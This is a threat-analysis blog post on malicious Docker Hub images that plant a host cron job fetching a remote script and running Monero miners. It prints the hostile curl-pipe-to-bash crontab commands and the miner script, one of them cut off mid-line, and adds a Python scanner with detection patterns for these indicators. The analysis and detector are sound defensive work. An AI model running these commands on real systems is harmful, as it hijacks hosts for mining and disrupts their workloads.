Crypto alpine

Author: Admin | 2025-04-27

Vulnerability within days of the patch being released by forcing public facing servers to download and execute a malicious cryptomining payload.

Even before December 2017 we documented Docker images hosted on the Docker Hub registry that were seen to embed malware. This was particularly the case for the Docker account docker123321, which was created in May 2017 (see Figure 1), and which currently provides 19 images under popular project names like Cron, Tomcat, and Mysql.

Figure 1: docker123321 home page on Docker Hub

When we inspect one of these images using the CLI, we see the following:

```
docker inspect docker123321/kk
…
"Cmd": [
    "/bin/sh",
    "-c",
    "echo -e \"* * * * * root /usr/bin/curl -s hxxp://198.181.41.97:8220/test44.sh | bash -s\\n\" >> /mnt/etc/crontab"
],
…
```

"Cmd" contains the command line run when the container starts, as can be seen above. It appends an entry to the Cron Linux job scheduler (writing to /mnt/etc/crontab, i.e. the host's crontab when the host filesystem is mounted at /mnt), the purpose of which is to automatically download a test44.sh file from a remote server and pipe it to bash. Here is the content of that shell script.
```bash
#!/bin/bash
(docker pause `docker ps|grep kube-apis |awk '{print $1}'`;
docker pause `docker ps|grep nginx78 |awk '{print $1}'`;
docker run --name sosmseww --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;
docker run --name sosmsea2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;
docker run --name sosmsen2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;
docker run --name sosmsek2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;
docker run --name sosmset2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;
kubectl delete $(kubectl --server=aaa get all | grep "nginx78-" | awk "{print \$1}"))
```

It appears to run five instances of the crypto mining official image bitnn/alpine-xmrig, under the names "sosmseww", "sosmsea2", "sosmsen2", "sosmsek2", and "sosmset2". That image is pulled automatically if it does not exist locally. All five of these containers connect to the crypto-pool.fr pool. Note that the script first pauses any running container whose name matches kube-apis or nginx78, and ends by deleting Kubernetes resources matching "nginx78-", so legitimate workloads on the same host are silenced while the miners run.

A more recent case is the image dubbed docker123321/cron, which was pushed onto the public registry in the first week of January.
```
docker inspect docker123321/cron
…
"Cmd": [
    "/bin/sh",
    "-c",
    "#(nop) ",
    "CMD [\"/bin/sh\" \"-c\" \"echo \\\"* * * * * curl -s hxxp://162.212.157.244:8220/logo1.jpg | bash -s\\\" >> /mnt/etc/crontab\"]"
],
…
```

That logo1.jpg file is not an image but a shell script that downloads and locally executes a cryptocurrency miner, as defined below:

```sh
#!/bin/sh
ps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read
```
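Both images above are caught by the same inspection step: the start-up command written into the image config appends a cron line to a mounted host crontab and pipes a remotely fetched script into a shell. The following is an added example, not code from the original post or from Aqua, that automates that check over `docker inspect` output. The image configs embedded in it are constructed to mimic the `docker inspect` JSON shape (top-level `Config.Cmd` / `Config.Entrypoint`, `RepoTags`), and the indicator list is an assumption drawn from the two cases on this page (host crontab write, `curl ... | bash`, a `stratum+tcp://` pool URL, the bitnn/alpine-xmrig image name), not a complete signature set.

```python
"""Flag Docker image configs whose start-up command shows the persistence
pattern described above. Added example; indicator patterns and sample
configs are constructed from the cases in the post, not a full signature set."""
import json
import re

# Name -> regex. Order matters only for the order of reported hits.
INDICATORS = [
    # cron entry appended to a host crontab exposed through a bind mount
    ("host-crontab-write", re.compile(r">>\s*/mnt/etc/crontab")),
    # a downloaded script executed straight from the pipe
    ("remote-script-piped-to-shell", re.compile(r"curl\s+[^|]*\|\s*(ba)?sh\b")),
    # a mining pool endpoint on the command line
    ("stratum-pool", re.compile(r"stratum\+tcp://")),
    # the miner image named in the post
    ("known-miner-image", re.compile(r"\bbitnn/alpine-xmrig\b")),
]


def cmd_string(image_config):
    """Join Entrypoint and Cmd (list or string form) into one string to scan."""
    cfg = image_config.get("Config") or {}
    parts = []
    for key in ("Entrypoint", "Cmd"):
        val = cfg.get(key)
        if isinstance(val, list):
            parts.extend(val)
        elif isinstance(val, str):
            parts.append(val)
    return " ".join(parts)


def scan_image(image_config):
    """Return the names of every indicator that matches the image's start command."""
    text = cmd_string(image_config)
    return [name for name, pattern in INDICATORS if pattern.search(text)]


def scan_inspect_output(raw_json):
    """Take raw `docker inspect` JSON (a list of image records) and return
    {repo_tag_or_id: [indicator names]} for the images that were flagged."""
    findings = {}
    for img in json.loads(raw_json):
        hits = scan_image(img)
        if hits:
            tag = (img.get("RepoTags") or [img.get("Id", "<unknown>")])[0]
            findings[tag] = hits
    return findings


# Constructed sample: one record shaped like the docker123321/kk case above,
# one benign web server image, and one that invokes the miner image directly.
SAMPLE = json.dumps([
    {"Id": "sha256:aaa", "RepoTags": ["docker123321/kk:latest"],
     "Config": {"Cmd": ["/bin/sh", "-c",
                        "echo -e \"* * * * * root /usr/bin/curl -s "
                        "hxxp://198.181.41.97:8220/test44.sh | bash -s\\n\" "
                        ">> /mnt/etc/crontab"]}},
    {"Id": "sha256:bbb", "RepoTags": ["library/nginx:1.13"],
     "Config": {"Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Id": "sha256:ccc", "RepoTags": ["example/miner-wrapper:1"],
     "Config": {"Entrypoint": ["/bin/sh", "-c"],
                "Cmd": ["docker run bitnn/alpine-xmrig -o stratum+tcp://pool.example:3333"]}},
])

if __name__ == "__main__":
    for tag, hits in scan_inspect_output(SAMPLE).items():
        print(f"{tag}: {', '.join(hits)}")
```

In practice the input would be the output of `docker inspect $(docker images -q)` (or a registry-side scan of image manifests before the image is ever pulled); a hit on `host-crontab-write` or `remote-script-piped-to-shell` alone is reason to quarantine the image, since no legitimate application image needs to edit the host's crontab from its start command.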